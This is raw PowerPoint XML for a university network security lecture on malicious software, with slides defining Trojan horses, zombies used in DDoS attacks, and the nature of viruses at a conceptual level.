              <a:rPr lang="ta-IN" smtClean="0"/>
              <a:t>2010/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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7" name="Rectangle 1030"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Malicious Software - </a:t>
            </a:r>
            <a:fld id="{BF707275-D238-4273-81C5-FAD91A12BF6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026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="152400"/>
            <a:ext cx="7620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1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="15240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6" name="Rectangle 1028"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524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DF0029"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0"/>
              <a:t>2010/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3077" name="Rectangle 1029"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2627313" y="6400800"/>
            <a:ext cx="360045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solidFill>
                  <a:srgbClr val="DF0029"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3413ICT Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3078" name="Rectangle 1030"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6400800" y="6400800"/>
            <a:ext cx="2590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DF0029"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Malicious Software - </a:t>
            </a:r>
            <a:fld id="{64A21556-B154-4B2E-BB94-F74D0360C799}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1031" name="Picture 1033"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="141288" y="95250"/>
            <a:ext cx="990600" cy="8239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dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1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mj-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>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ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3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ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4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ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5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ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="4572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6pPr>
      <a:lvl7pPr marL="9144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7pPr>
      <a:lvl8pPr marL="13716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8pPr>
      <a:lvl9pPr marL="18288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9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" indent="-342900" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="DF0029"/>
        </a:buClr>
        <a:buChar char="•"/>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lr>
          <a:srgbClr val="DF0029"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>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lr>
          <a:srgbClr val="DF0029"/>
        </a:buClr>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lr>
          <a:srgbClr val="DF0029"/>
        </a:buClr>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lr>
          <a:srgbClr val="DF0029"/>
        </a:buClr>
        <a:buChar char="»"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2514600" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="DF0029"/>
        </a:buClr>
        <a:buChar char="»"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2971800" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="DF0029"/>
        </a:buClr>
        <a:buChar char="»"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3429000" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="DF0029"/>
        </a:buClr>
        <a:buChar char="»"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3886200" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="DF0029"/>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upload.wikimedia.org/wikipedia/commons/8/86/Robert_Tappan_Morris.jpg" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.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exxx.or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a.com/au/securityadvisor/pest/browse.aspx?cat=Key%20Logger"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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1773238"/>
            <a:ext cx="7772400" cy="1427162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>3413ICT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Network Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15362" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="3573463"/>
            <a:ext cx="7775575" cy="995362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Lecture 5A: Malicious Software</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3413ICT Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="4797425"/>
            <a:ext cx="6400800" cy="1203325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Dr V. Muthukkumarasamy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>B.Sc.Eng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>) (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Peradeniya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>), PhD (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Cantab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>), MIEE, MIEEE</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1600" b="1" dirty="0">
              <a:latin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370" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="152400"/>
            <a:ext cx="6813550" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Trojan Horse</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25602" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755650" y="1268413"/>
            <a:ext cx="8229600" cy="4949825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Program with hidden side-effects </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Usually superficially attractive:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>e.g.,  game, s/w upgrade, etc </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>When running, perform some additional tasks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>allows attacker to indirectly gain access they do not have directly</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Often used to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>propagate a virus/worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>install a backdoor or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>or simply to destroy data</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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394" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="152400"/>
            <a:ext cx="6813550" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Zombie</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26626" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="1341438"/>
            <a:ext cx="5256212" cy="5019675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Program which secretly takes over another networked computer(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="20000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Then uses it to indirectly launch attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="20000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Often used to launch distributed denial of   service (DDoS) attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26627" name="Picture 11" descr="http://www.techexams.net/technotes/securityplus/images/ddosattack.gif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5364163" y="1484313"/>
            <a:ext cx="3671887" cy="3097212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5724525" y="4724400"/>
            <a:ext cx="3311525" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="DF0029"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DDoS attack architecture </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="DF0029"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="3200">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="152400"/>
            <a:ext cx="6813550" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Nature of Viruses</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27650" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539750" y="1341438"/>
            <a:ext cx="8353425" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>A piece of self-replicating code attached to some other code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2800" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Both propagate themselves &amp; carry a payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>carries code to make copies of itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>as well as code to perform some covert task</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
